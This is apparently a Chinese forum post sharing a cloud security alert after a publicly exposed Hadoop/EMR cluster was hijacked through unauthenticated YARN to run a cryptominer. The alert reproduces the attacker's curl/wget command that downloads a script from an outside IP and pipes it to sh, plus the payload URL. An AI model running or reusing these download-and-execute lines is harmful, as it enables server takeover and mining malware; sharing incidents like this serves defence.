由于 有个同事手滑 把 emr 开放给公网了，结果被挂了挖矿的货，发出来大家看看

恶意脚本-恶意脚本代码执行待处理
备注
该告警由如下引擎检测发现：
命令行: wget --user-agent hadoopUnauth -q -O - http://194.145.227.21/ldr.sh
进程 PID: 20234
进程文件名: wget
父进程 ID: 19624
父进程文件路径: /usr/bin/bash
进程链:
-[3020]  /usr/lib/jvm/java-1.8.0/bin/java -Dproc_nodemanager -Xmx1536m -Dhadoop.log.dir=/var/log/hadoop-yarn -Dyarn.log.dir=/var/log/hadoop-yarn -Dhadoop.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.home.dir= -Dyarn.id.str=hadoop -Dhadoop.root.logger=INFO,RFA -Dyarn.root.logger=INFO,RFA -Dnodemanager.audit.logger.appender=NMAUDIT -Djava.library.path=/usr/lib/hadoop-current/lib/native::/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native -Dyarn.policy.file=hadoop-policy.xml -server -javaagent:/var/lib/ecm-agent/data/jmxetric-1.0.8.jar=host=localhost,port=8649,mode=unicast,wireformat31x=true,process=YARN_NodeManager,cxss=/var/lib/ecm-agent/data/jmxetric.xml -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCTimeStamps -XX:+PrintGCDateStamps -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=128M -Xloggc:/var/log/hadoop-yarn/nodemanager-gc.log -Dhadoop.log.dir=/var/log/hadoop-yarn -Dyarn.log.dir=/var/log/hadoop-yarn -Dhadoop.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.home.dir=/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1 -Dhadoop.home.dir=/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1 -Dhadoop.root.logger=INFO,RFA -Dyarn.root.logger=INFO,RFA -Djava.library.path=/usr/lib/hadoop-current/lib/native::/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native -classpath /etc/ecm/hadoop-conf:/etc/ecm/hadoop-conf:/etc/ecm/hadoop-conf:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/common/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/common/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/hdfs:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/hdfs/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/hdfs/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/mapreduce/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/mapreduce/*:/usr/lib/hadoop-current/lib/*:/usr/lib/tez-current/*:/usr/lib/tez-current/lib/*:/etc/ecm/tez-conf:/opt/apps/extra-jars/*:/usr/lib/spark-current/yarn/spark-2.4.5-yarn-shuffle.jar:/usr/lib/hadoop-current/contrib/capacity-scheduler/*.jar:/usr/lib/hadoop-current/contrib/capacity-scheduler/*.jar:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/lib/*:/etc/ecm/hadoop-conf/nm-config/log4j.properties org.apache.hadoop.yarn.server.nodemanager.NodeManager
    -[19619]  bash /mnt/disk2/yarn/usercache/dr.who/appcache/application_1612510029551_7345/container_1612510029551_7345_02_000001/default_container_executor.sh
        -[19622]  /bin/bash -c (curl --user-agent hadoopUnauth http://194.145.227.21/ldr.sh||wget --user-agent hadoopUnauth -q -O - http://194.145.227.21/ldr.sh)|sh
            -[19624]  /bin/bash -c (curl --user-agent hadoopUnauth http://194.145.227.21/ldr.sh||wget --user-agent hadoopUnauth -q -O - http://194.145.227.21/ldr.sh)|sh

事件说明: 云安全中心检测到您的主机正在执行恶意的脚本代码(包括但不限于 bash 、powershell 、python)，请立刻排查入侵来源。如果是您的运维行为，请选择忽略。

http://194.145.227.21/ldr.sh